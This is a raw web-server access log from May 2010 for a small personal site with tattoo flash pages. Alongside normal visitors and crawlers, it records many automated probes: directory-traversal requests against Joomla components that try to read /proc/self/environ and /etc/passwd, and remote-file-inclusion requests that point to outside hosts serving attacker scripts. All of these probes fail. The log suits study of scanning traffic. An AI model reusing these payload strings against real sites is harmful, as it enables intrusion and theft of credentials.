217.195.204.106 - - [30/May/2010:19:00:00 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.195.112.180 - - [30/May/2010:19:06:45 -0500] "GET /logs/access_log.1188777600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.166.5.159 - - [30/May/2010:19:08:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=vintage+flash&hl=en&client=firefox-a&hs=BWY&rls=org.mozilla:en-US:official&source=lnms&ei=8_0CTN_sH5WyNsXt6Ds&sa=X&oi=mode_link&ct=mode""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.166.5.159 - - [30/May/2010:19:08:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.199.51 - - [30/May/2010:19:14:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.51 - - [30/May/2010:19:14:26 -0500] "GET /logs/access_log.1155513600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.178 - - [30/May/2010:19:15:26 -0500] "GET /logs/access_log.1190332800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.128.84.14 - - [30/May/2010:19:17:16 -0500] "GET /logs//extern/cmpro.extern/cmpro_header.inc.php?cm_ext_server=http://www.akiropes.com/administrator/templates/system/sc1%20? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:19:17:16 -0500] "GET /logs/access_log.1239753600//extern/cmpro.extern/cmpro_header.inc.php?cm_ext_server=http://www.akiropes.com/administrator/templates/system/sc1%20? HTTP/1.1" 404 352 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:19:17:16 -0500] "GET //extern/cmpro.extern/cmpro_header.inc.php?cm_ext_server=http://www.akiropes.com/administrator/templates/system/sc1%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:19:18:05 -0500] "GET /logs/access_log.1227225600//extern/cmpro.extern/cmpro_header.inc.php?cm_ext_server=http://www.akiropes.com/administrator/templates/system/sc1%20? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.199.38 - - [30/May/2010:19:25:26 -0500] "GET /logs/access_log.1193702400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [30/May/2010:19:26:04 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
64.202.123.91 - - [30/May/2010:19:27:19 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://207.210.125.213/~theworld/main/info//USER.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
64.202.123.91 - - [30/May/2010:19:27:19 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://207.210.125.213/~theworld/main/info//USER.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.826"
209.44.120.3 - - [30/May/2010:19:28:21 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [30/May/2010:19:28:21 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.13.49 - - [30/May/2010:19:39:26 -0500] "GET /logs/access_log.1232582400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.154.225.116 - - [30/May/2010:19:50:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.nz/search?q=vintage+tattoos&hl=en&rlz=1W1GPEA_en&prmd=iv&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
222.154.225.116 - - [30/May/2010:19:50:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
222.154.225.116 - - [30/May/2010:19:50:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
67.195.112.180 - - [30/May/2010:20:00:03 -0500] "GET /logs/access_log.1262736000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.63.216.245 - - [30/May/2010:20:01:46 -0500] "GET /logs/index2.php?url_page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
74.63.216.245 - - [30/May/2010:20:01:46 -0500] "GET /index2.php?url_page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
87.250.255.243 - - [30/May/2010:20:05:48 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.75.82 - - [30/May/2010:20:11:20 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:11:20 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
207.46.195.242 - - [30/May/2010:20:11:26 -0500] "GET /logs/access_log.1228348800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.75.82 - - [30/May/2010:20:11:27 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:11:27 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:11:28 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:11:28 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:11:30 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:11:30 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:11:33 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:11:33 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [30/May/2010:20:11:35 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:11:35 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
89.145.108.230 - - [30/May/2010:20:11:36 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:11:36 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.145.108.230 - - [30/May/2010:20:11:36 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:11:36 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [30/May/2010:20:11:37 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:11:37 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:11:42 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:11:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:11:46 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
192.167.114.31 - - [30/May/2010:20:11:50 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:11:50 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
193.41.235.46 - - [30/May/2010:20:11:52 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:11:52 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
74.55.65.134 - - [30/May/2010:20:11:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
193.41.235.46 - - [30/May/2010:20:12:06 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:12:06 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [30/May/2010:20:12:12 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:12:12 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
192.167.114.31 - - [30/May/2010:20:12:12 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:12:13 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
193.41.235.46 - - [30/May/2010:20:12:16 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:12:16 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [30/May/2010:20:12:20 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:12:20 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
192.167.114.31 - - [30/May/2010:20:12:32 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:12:32 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
69.175.75.82 - - [30/May/2010:20:16:21 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:16:21 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:16:29 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:16:29 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
193.41.235.46 - - [30/May/2010:20:16:33 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:16:34 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [30/May/2010:20:16:36 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:16:36 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
89.145.108.230 - - [30/May/2010:20:16:41 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:16:41 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:16:44 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:16:44 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:16:44 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:16:45 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [30/May/2010:20:16:53 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:16:54 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
89.145.108.230 - - [30/May/2010:20:16:55 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:16:55 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
192.167.114.31 - - [30/May/2010:20:16:55 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:16:55 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
80.233.172.42 - - [30/May/2010:20:16:58 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:16:58 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
193.41.235.46 - - [30/May/2010:20:17:01 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:17:01 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [30/May/2010:20:17:07 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:17:07 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [30/May/2010:20:17:09 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:17:09 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [30/May/2010:20:17:22 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:17:23 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:17:38 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:17:39 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
74.55.65.134 - - [30/May/2010:20:20:20 -0500] "GET /logs/access_log.1273017600///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:20:20 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:20:20 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:20:22 -0500] "GET /logs/access_log.1273017600///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:20:23 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:20:23 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:22:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:20:23:11 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
38.101.148.126 - - [30/May/2010:20:25:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [30/May/2010:20:25:41 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
80.233.172.42 - - [30/May/2010:20:35:01 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:35:01 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
193.41.235.46 - - [30/May/2010:20:35:06 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:35:06 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [30/May/2010:20:35:10 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:35:10 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
192.167.114.31 - - [30/May/2010:20:35:20 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:35:20 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
80.233.172.42 - - [30/May/2010:20:35:21 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:35:21 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
69.175.75.82 - - [30/May/2010:20:35:23 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:35:23 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
